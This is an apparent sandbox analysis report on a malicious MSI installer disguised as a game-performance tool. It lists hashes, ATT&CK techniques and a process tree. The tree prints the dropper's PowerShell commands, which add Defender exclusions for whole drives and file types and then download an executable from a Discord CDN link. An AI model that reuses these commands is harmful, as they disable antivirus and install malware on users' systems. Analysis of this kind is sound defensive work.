0c93ad2770b6428e558ee08382ffb14d8faccad8932c9abb119b76badf08cba6

Analysis

max time kernel
117s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
31/12/2022, 15:30

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Fast_FPS_by_Untie.msi
Size

408KB
MD5

b3fdf1a56d2b3a15b9b6cced090e2bbd
SHA1

401d9a223d082b02c529db39c723d6cc00caabf0
SHA256

0c93ad2770b6428e558ee08382ffb14d8faccad8932c9abb119b76badf08cba6
SHA512

45b452f25e58d233e139c8bdc6fb35c22fe0fe1da3ec2918c11342d49fa4d383267ab83adabf5c0612572fc5dcec74c5205573cfd31b3df90489cc341f2f68ef
SSDEEP

6144:uqtOIiRQYpgjpjew5LLyGx1qo8nyKx45qVv0ja+N5xBnYb0Y:uqtMRQ+gjpjegLyo8FsqV8jGbP

Score

8^/10

discovery

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
53	4228	powershell.exe

Downloads MZ/PE file

Loads dropped DLL 1 IoCs

pid	Process
2800	MsiExec.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4708	ICACLS.EXE

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\LOGS\DPX\setuperr.log	EXPAND.EXE
File created	C:\Windows\Installer\e58268e.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e58268e.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File created	C:\Windows\Installer\SourceHash{2ECAD76B-F975-4FBB-BDA8-EAE154922AB0}	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI28FF.tmp	msiexec.exe
File opened for modification	C:\Windows\LOGS\DPX\setupact.log	EXPAND.EXE

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000007c4a2b5d7b48cb040000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800007c4a2b5d0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3f000000ffffffff0000000007000100006809007c4a2b5d000000000000d0120000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000007c4a2b5d00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000007c4a2b5d00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
1356	msiexec.exe
1356	msiexec.exe
4516	powershell.exe
4516	powershell.exe
1964	powershell.exe
1964	powershell.exe
548	powershell.exe
548	powershell.exe
3248	powershell.exe
3248	powershell.exe
776	powershell.exe
776	powershell.exe
3744	powershell.exe
3744	powershell.exe
2340	powershell.exe
2340	powershell.exe
4820	powershell.exe
4820	powershell.exe
4932	powershell.exe
4932	powershell.exe
4228	powershell.exe
4228	powershell.exe

Suspicious use of AdjustPrivilegeToken 59 IoCs

description	pid	Process
Token: SeShutdownPrivilege	5080	msiexec.exe
Token: SeIncreaseQuotaPrivilege	5080	msiexec.exe
Token: SeSecurityPrivilege	1356	msiexec.exe
Token: SeCreateTokenPrivilege	5080	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	5080	msiexec.exe
Token: SeLockMemoryPrivilege	5080	msiexec.exe
Token: SeIncreaseQuotaPrivilege	5080	msiexec.exe
Token: SeMachineAccountPrivilege	5080	msiexec.exe
Token: SeTcbPrivilege	5080	msiexec.exe
Token: SeSecurityPrivilege	5080	msiexec.exe
Token: SeTakeOwnershipPrivilege	5080	msiexec.exe
Token: SeLoadDriverPrivilege	5080	msiexec.exe
Token: SeSystemProfilePrivilege	5080	msiexec.exe
Token: SeSystemtimePrivilege	5080	msiexec.exe
Token: SeProfSingleProcessPrivilege	5080	msiexec.exe
Token: SeIncBasePriorityPrivilege	5080	msiexec.exe
Token: SeCreatePagefilePrivilege	5080	msiexec.exe
Token: SeCreatePermanentPrivilege	5080	msiexec.exe
Token: SeBackupPrivilege	5080	msiexec.exe
Token: SeRestorePrivilege	5080	msiexec.exe
Token: SeShutdownPrivilege	5080	msiexec.exe
Token: SeDebugPrivilege	5080	msiexec.exe
Token: SeAuditPrivilege	5080	msiexec.exe
Token: SeSystemEnvironmentPrivilege	5080	msiexec.exe
Token: SeChangeNotifyPrivilege	5080	msiexec.exe
Token: SeRemoteShutdownPrivilege	5080	msiexec.exe
Token: SeUndockPrivilege	5080	msiexec.exe
Token: SeSyncAgentPrivilege	5080	msiexec.exe
Token: SeEnableDelegationPrivilege	5080	msiexec.exe
Token: SeManageVolumePrivilege	5080	msiexec.exe
Token: SeImpersonatePrivilege	5080	msiexec.exe
Token: SeCreateGlobalPrivilege	5080	msiexec.exe
Token: SeBackupPrivilege	432	vssvc.exe
Token: SeRestorePrivilege	432	vssvc.exe
Token: SeAuditPrivilege	432	vssvc.exe
Token: SeBackupPrivilege	1356	msiexec.exe
Token: SeRestorePrivilege	1356	msiexec.exe
Token: SeRestorePrivilege	1356	msiexec.exe
Token: SeTakeOwnershipPrivilege	1356	msiexec.exe
Token: SeRestorePrivilege	1356	msiexec.exe
Token: SeTakeOwnershipPrivilege	1356	msiexec.exe
Token: SeDebugPrivilege	4516	powershell.exe
Token: SeDebugPrivilege	1964	powershell.exe
Token: SeBackupPrivilege	2376	srtasks.exe
Token: SeRestorePrivilege	2376	srtasks.exe
Token: SeSecurityPrivilege	2376	srtasks.exe
Token: SeTakeOwnershipPrivilege	2376	srtasks.exe
Token: SeBackupPrivilege	2376	srtasks.exe
Token: SeRestorePrivilege	2376	srtasks.exe
Token: SeSecurityPrivilege	2376	srtasks.exe
Token: SeTakeOwnershipPrivilege	2376	srtasks.exe
Token: SeDebugPrivilege	548	powershell.exe
Token: SeDebugPrivilege	3248	powershell.exe
Token: SeDebugPrivilege	776	powershell.exe
Token: SeDebugPrivilege	3744	powershell.exe
Token: SeDebugPrivilege	2340	powershell.exe
Token: SeDebugPrivilege	4820	powershell.exe
Token: SeDebugPrivilege	4932	powershell.exe
Token: SeDebugPrivilege	4228	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
5080	msiexec.exe

Suspicious use of WriteProcessMemory 50 IoCs

description	pid	Process	procid_target
PID 1356 wrote to memory of 2376	1356	msiexec.exe	92
PID 1356 wrote to memory of 2376	1356	msiexec.exe	92
PID 1356 wrote to memory of 2800	1356	msiexec.exe	94
PID 1356 wrote to memory of 2800	1356	msiexec.exe	94
PID 1356 wrote to memory of 2800	1356	msiexec.exe	94
PID 2800 wrote to memory of 4708	2800	MsiExec.exe	95
PID 2800 wrote to memory of 4708	2800	MsiExec.exe	95
PID 2800 wrote to memory of 4708	2800	MsiExec.exe	95
PID 2800 wrote to memory of 2680	2800	MsiExec.exe	97
PID 2800 wrote to memory of 2680	2800	MsiExec.exe	97
PID 2800 wrote to memory of 2680	2800	MsiExec.exe	97
PID 2800 wrote to memory of 2484	2800	MsiExec.exe	99
PID 2800 wrote to memory of 2484	2800	MsiExec.exe	99
PID 2800 wrote to memory of 2484	2800	MsiExec.exe	99
PID 2484 wrote to memory of 3380	2484	cmd.exe	101
PID 2484 wrote to memory of 3380	2484	cmd.exe	101
PID 2484 wrote to memory of 3380	2484	cmd.exe	101
PID 3380 wrote to memory of 3704	3380	net.exe	102
PID 3380 wrote to memory of 3704	3380	net.exe	102
PID 3380 wrote to memory of 3704	3380	net.exe	102
PID 2484 wrote to memory of 4516	2484	cmd.exe	103
PID 2484 wrote to memory of 4516	2484	cmd.exe	103
PID 2484 wrote to memory of 4516	2484	cmd.exe	103
PID 2484 wrote to memory of 1964	2484	cmd.exe	104
PID 2484 wrote to memory of 1964	2484	cmd.exe	104
PID 2484 wrote to memory of 1964	2484	cmd.exe	104
PID 2484 wrote to memory of 548	2484	cmd.exe	105
PID 2484 wrote to memory of 548	2484	cmd.exe	105
PID 2484 wrote to memory of 548	2484	cmd.exe	105
PID 2484 wrote to memory of 3248	2484	cmd.exe	106
PID 2484 wrote to memory of 3248	2484	cmd.exe	106
PID 2484 wrote to memory of 3248	2484	cmd.exe	106
PID 2484 wrote to memory of 776	2484	cmd.exe	107
PID 2484 wrote to memory of 776	2484	cmd.exe	107
PID 2484 wrote to memory of 776	2484	cmd.exe	107
PID 2484 wrote to memory of 3744	2484	cmd.exe	109
PID 2484 wrote to memory of 3744	2484	cmd.exe	109
PID 2484 wrote to memory of 3744	2484	cmd.exe	109
PID 2484 wrote to memory of 2340	2484	cmd.exe	110
PID 2484 wrote to memory of 2340	2484	cmd.exe	110
PID 2484 wrote to memory of 2340	2484	cmd.exe	110
PID 2484 wrote to memory of 4820	2484	cmd.exe	111
PID 2484 wrote to memory of 4820	2484	cmd.exe	111
PID 2484 wrote to memory of 4820	2484	cmd.exe	111
PID 2484 wrote to memory of 4932	2484	cmd.exe	112
PID 2484 wrote to memory of 4932	2484	cmd.exe	112
PID 2484 wrote to memory of 4932	2484	cmd.exe	112
PID 2484 wrote to memory of 4228	2484	cmd.exe	113
PID 2484 wrote to memory of 4228	2484	cmd.exe	113
PID 2484 wrote to memory of 4228	2484	cmd.exe	113

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Fast_FPS_by_Untie.msi
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5080

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1356
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2376
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 4CD78D01ADC4F0BEFCE7A7F480D0F93B
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2800
- - C:\Windows\SysWOW64\ICACLS.EXE
    "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-fa592366-4b5d-4d1e-9fb1-e2db5fbf6785\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
    3⤵
    - Modifies file permissions
    PID:4708
- - C:\Windows\SysWOW64\EXPAND.EXE
    "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
    3⤵
    - Drops file in Windows directory
    PID:2680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MW-fa592366-4b5d-4d1e-9fb1-e2db5fbf6785\files\UntiePerformance - Copy - Copy.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2484
  - - C:\Windows\SysWOW64\net.exe
      NET FILE
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3380
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 FILE
        5⤵
        
        PID:3704
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-ExecutionPolicy -Force -ExecutionPolicy Unrestricted
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4516
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath C:\
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1964
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath D:\
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:548
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath E:\
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3248
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionExtension exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:776
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionProcess Fast_FPS.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3744
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionExtension tmp
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2340
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionExtension exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4820
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionExtension bat
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4932
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Invoke-WebRequest -Uri https://cdn.discordapp.com/attachments/918358647397036053/973534551185973318/Fast_FPS.exe -OutFile C:\Fast_FPS.exe
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4228

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:432

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
74beabd4347b1ecc24fdc6cd9bb2ec64

SHA1
b793909bd2bf91d40eafb71194cc3eeb0c057110

SHA256
80d19c23e407ccffe9f5b43087c752b2157294a1e42d887705b9924ceb9e6af9

SHA512
f36be6d71e6ae79ffa79e9bc8d57e79cc14ace932fcc2106ab4df8f4ba99506dac3c007d986dfe3bf8884977a411ba1faa713489dc27b25c23bec49d42abd802

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
38d82e061625d5792aeb96be213c706b

SHA1
677074b587f61634046a6d57fdeb991199b08eb1

SHA256
d6c7e248cbb54835e445470f084ce3267bcc6f798e68b36966c09d0f1c21a4b7

SHA512
cf64ddd53103aad456b55739484b40c07a900a89408cc6a5c78dcd82020ab53978e88520d83f5c8f3f5bfab26bea70548e9d317aee0750c125464af99bbe5bd2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
2371f7d6f173cd51121520582a953e04

SHA1
082a1b771c018f8d43a4d372dede0e0b7451714c

SHA256
3b6f8b59d336be6d98bcd6b40ef31bc58c1d7b765a953e1783601026e117526c

SHA512
58fa11711d506b000dba6c41e7e2b17f6da71908f1cd9d8d8978e1fb8f2d7421e7d8f36983d4d3538ae682fa89418248f1377dbe5d5d5197470129ee70c897b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
71a26fea785723f6a724d5327b006795

SHA1
36902946a7b937e0c81a4eac86bdf14ec361e625

SHA256
f602fcb731ddc1b1afb0f196aa1e998529b06d3e9b3ee97ddc1485342fd84752

SHA512
53a19312979dd546462d0b93fdc3e9db8e8e286aad8f46d684d696c11141c6d992eb2fb534a6bf2337928098167185ba12246291c2ee3eeeeb33ec2e1558bb3e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
64eab2f1ae497ce7599810177dd784e6

SHA1
d899801539ad131e1db5369a340d88396b6dcd9c

SHA256
f904ba8830e34daa15734f41067cc4d29e3a41831888ec4a3450c250b786bf84

SHA512
b8be4173cca610b7e2c9a3bb6a8306997bd90c24bb275e716cada929c3765213ff2a60ff470ad2f652575c1a5f2d59b7c796b9a1091af0d45926a8f5cd75f3aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
746e5f195a00fbef79b1a25f30ed3d2f

SHA1
342d5b7d4c611a03097d10be7e12f447a4a6ee1e

SHA256
f2abdffc2947ce97d67df1d7346ede5aad836ea8fe548dbc211bb4840a05ca37

SHA512
8ef278ff28dc3f714d58aad2a6e41ca22d73ebc6512c703635430d102be820d9047e0407e17f5a819fa509b15c15e2aeefed0a9ac7ea5abde8d3f815052791f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
407bf14d7a2b4a3b5ec4434eeab62954

SHA1
f0a5c5183edb8c2fb740914818cc7caf4eba0c92

SHA256
9cdf4c9038858050dbfc7af465e4c4f362c3495390993f049d1537f6f0a1fb8e

SHA512
0065da40c9ce54b12120a9960ac58c64d02c5e65feec353c09f83f6fc42bb76110681c7eee30c3637968a41da7f692f654b16c81015711b7f1c4dbb14e1bc350

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
99f0ed18e0109b35dbfb904963941e3f

SHA1
07294675ffd294a266c4011400cd9dd16dd9715a

SHA256
a9e8456e6163f1ba289f192cef4121479344173c4295219a2382c88c7331d34c

SHA512
b5ca5df0de7af7138a239703f87a2bc2c7823a8673e1ffc9d0f6a81a0a334a79627f076fc8e2f6f8d906f56eb5fb42291e309c1781be65731f06e43c669b8176

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
01f761a40a22c7467806336190451d06

SHA1
f0cb2949c940e4352cc2b6a29da93ca64a06b80c

SHA256
af61272526b486fb0f4c25e4c9345b928472eb747b5d68a45275d295c8dcf7af

SHA512
37aecb354877b6eaaa075270d164da0558b110ca42143c96af465d815e125d48faa0d36e1558fa4da4762d39562de070cc452cb9058d719b4b94005a731caf04

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
b24fdd92c38e1169c98195f219a2d82e

SHA1
d334165a25019c24ff4ff688c170411445877c6b

SHA256
d154600082346a85a0899524164d10032aaf99d98a6a4afae7509df0733622c3

SHA512
de883feb786930b7bad38b92ac4fe85d4c41d15ef10c93b30b51fbcaa0ad180f4c41d1762ee63dd22660c5f30376e57fd886164bef219878c71843aeb319cbe7

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-fa592366-4b5d-4d1e-9fb1-e2db5fbf6785\files.cab

Filesize
863B

MD5
f6377a186da24de5c0579131d3e914d5

SHA1
94d57adb5e80447a7d0645096a20ae9e08f5d353

SHA256
8bc9db6e3bad52a0456afbb2f1d2e511a3a7daa6c5af23fdaa9afdcf077f7c5c

SHA512
2380ca7762174ee27e87a41c36c8e66c3660417b1dc3018206bf1ebb501f90351cdbcf690e02ed331dfe896d3cc11b424a88c951dd21247d98b5a2f48c269053

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-fa592366-4b5d-4d1e-9fb1-e2db5fbf6785\files\UntiePerformance - Copy - Copy.bat

Filesize
2KB

MD5
8bbbd92335d2779351ffcbe279696df6

SHA1
cc15c9e1165d093f22f69221a7657e5e7585657b

SHA256
f2be711af6168320ac273a0fcc66b41526d0c04fd9e20e9f4de34ef065b1b50a

SHA512
f204e2bbc8c4c88322a1483b135c5198f39ba895c6b363dc81a3f2ffc3b10061d2d13dc7872e058dd2cc99a83b121a413148641174d57cbbcde25ae98cd5eace

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-fa592366-4b5d-4d1e-9fb1-e2db5fbf6785\msiwrapper.ini

Filesize
1KB

MD5
6dc920c0719fd6f2df84166b0d8800e3

SHA1
526339348ecf9f33f928bdcb61738bb9d0516df6

SHA256
96e417513d8b817c5d997410c31a75275fd3a7bb47354d6877405b1e4bc3f054

SHA512
3c7afd7bf5b88b768024f8bf4061697f08dbec05a4dfdb5a2aa73038104bbd6779f6e33172c97ba518465e8e6e30004f412a845c17c60f3ffccb0e81ff710453

Download Submit
C:\Windows\Installer\MSI28FF.tmp

Filesize
208KB

MD5
4caaa03e0b59ca60a3d34674b732b702

SHA1
ee80c8f4684055ac8960b9720fb108be07e1d10c

SHA256
d01af2b8c692dffb04a5a04e3ccd0d0a3b2c67c8fc45a4b68c0a065b4e64cc3d

SHA512
25888848871286bdd1f9c43a0fba35640edb5bafbe0c6aa2f9708a070ea4e5b16745b7c4f744ae4f5643f75ef47f196d430bf70921ed27715f712825ec590a34

Download Submit
C:\Windows\Installer\MSI28FF.tmp

Filesize
208KB

MD5
4caaa03e0b59ca60a3d34674b732b702

SHA1
ee80c8f4684055ac8960b9720fb108be07e1d10c

SHA256
d01af2b8c692dffb04a5a04e3ccd0d0a3b2c67c8fc45a4b68c0a065b4e64cc3d

SHA512
25888848871286bdd1f9c43a0fba35640edb5bafbe0c6aa2f9708a070ea4e5b16745b7c4f744ae4f5643f75ef47f196d430bf70921ed27715f712825ec590a34

Download Submit
\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

Filesize
23.0MB

MD5
00c8fe071216485c10b44bf04db33285

SHA1
f79848578a297908d82998843c5757f87975310d

SHA256
226e1a62dfd38f9b0ca4328a64ad5d6c696eb60331cf47c4a14f852710f34c07

SHA512
88281c319e81c6ff339f05365762e2ba6247f03a6999f70dd2f8f12b5432ba09c139efc775024402607cbdc070863be99e6149d5245967f5cb5ef3e82d654f89

Download Submit
\??\Volume{5d2b4a7c-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{e5cfe755-b38b-4fe0-9d14-8cf84a57f61b}_OnDiskSnapshotProp

Filesize
5KB

MD5
46a7641b86708a972dd9552d4cee201b

SHA1
ff30b4b46d19fc9e263018cfd14f38c0f4eb69c2

SHA256
6bc55fea59be2a164cf6c5593b0263388c93f7bc785a6d97022721d9a6200d9c

SHA512
c819a13460620e6f684171716bbc3737413e53fcbd59ab986b584dcd2cc0270e3d3b4f838a06f80539d19a74a22b5aa429ae342a5c32d8ab23d7d59ad3189ac4

Download Submit
memory/548-169-0x000000006EED0000-0x000000006EF1C000-memory.dmp

Filesize
304KB

Download
memory/776-175-0x000000006EED0000-0x000000006EF1C000-memory.dmp

Filesize
304KB

Download
memory/1964-164-0x0000000007B80000-0x0000000007B8E000-memory.dmp

Filesize
56KB

Download
memory/1964-166-0x0000000007BD0000-0x0000000007BD8000-memory.dmp

Filesize
32KB

Download
memory/1964-165-0x0000000007CA0000-0x0000000007CBA000-memory.dmp

Filesize
104KB

Download
memory/1964-163-0x000000006EED0000-0x000000006EF1C000-memory.dmp

Filesize
304KB

Download
memory/2340-181-0x000000006EED0000-0x000000006EF1C000-memory.dmp

Filesize
304KB

Download
memory/3248-172-0x000000006EED0000-0x000000006EF1C000-memory.dmp

Filesize
304KB

Download
memory/3744-178-0x000000006EED0000-0x000000006EF1C000-memory.dmp

Filesize
304KB

Download
memory/4516-156-0x0000000007600000-0x000000000760A000-memory.dmp

Filesize
40KB

Download
memory/4516-150-0x0000000006290000-0x00000000062AE000-memory.dmp

Filesize
120KB

Download
memory/4516-152-0x000000006EED0000-0x000000006EF1C000-memory.dmp

Filesize
304KB

Download
memory/4516-151-0x0000000007280000-0x00000000072B2000-memory.dmp

Filesize
200KB

Download
memory/4516-145-0x0000000002970000-0x00000000029A6000-memory.dmp

Filesize
216KB

Download
memory/4516-146-0x00000000053F0000-0x0000000005A18000-memory.dmp

Filesize
6.2MB

Download
memory/4516-147-0x00000000052C0000-0x00000000052E2000-memory.dmp

Filesize
136KB

Download
memory/4516-157-0x0000000007810000-0x00000000078A6000-memory.dmp

Filesize
600KB

Download
memory/4516-148-0x0000000005B90000-0x0000000005BF6000-memory.dmp

Filesize
408KB

Download
memory/4516-155-0x0000000007590000-0x00000000075AA000-memory.dmp

Filesize
104KB

Download
memory/4516-153-0x0000000006840000-0x000000000685E000-memory.dmp

Filesize
120KB

Download
memory/4516-154-0x0000000007BF0000-0x000000000826A000-memory.dmp

Filesize
6.5MB

Download
memory/4516-149-0x0000000005C70000-0x0000000005CD6000-memory.dmp

Filesize
408KB

Download
memory/4820-184-0x000000006EED0000-0x000000006EF1C000-memory.dmp

Filesize
304KB

Download
memory/4932-187-0x000000006EED0000-0x000000006EF1C000-memory.dmp

Filesize
304KB

Download